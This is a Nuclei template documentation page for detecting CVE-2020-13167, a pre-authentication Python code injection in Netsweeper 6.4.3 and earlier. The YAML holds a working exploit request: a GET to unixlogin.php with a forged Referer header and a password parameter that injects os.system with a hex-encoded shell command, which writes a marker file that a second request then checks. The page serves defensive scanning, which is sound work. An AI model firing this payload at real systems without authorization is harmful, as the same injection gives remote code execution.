Skip to content
Nuclei Templates

Netsweeper <=6.4.3 - Python Code Injection

ID: CVE-2020-13167

Severity: critical

Author: dwisiswant0

Tags: cve2020,cve,netsweeper,rce,python,webadmin

Description

Section titled “Description”

Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.

YAML Source

Section titled “YAML Source”
id: CVE-2020-13167


info:
  name: Netsweeper <=6.4.3 - Python Code Injection
  author: dwisiswant0
  severity: critical
  description: |
    Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
  remediation: |
    Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability.
  reference:
    - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
    - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13167
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13167
    cwe-id: CWE-78
    epss-score: 0.97432
    epss-percentile: 0.9994
    cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: netsweeper
    product: netsweeper
  tags: cve2020,cve,netsweeper,rce,python,webadmin
variables:
  rand_str: "{{randstr}}"
  cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out'


http:
  - method: GET
    path:
      - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5"
      - "{{BaseURL}}/webadmin/out"


    headers:
      Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{rand_str}}"


      - type: status
        status:
          - 200
# digest: 490a0046304402205346eb120f7be72b48a51f7f8963dfc2defd85f0a8982d3f241d1bb0662a8985022004eda3d21f3a12eab3b922b96218c21973ea42547b52142db5fec8f5ecfc6990:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-13167.yaml"

View on Github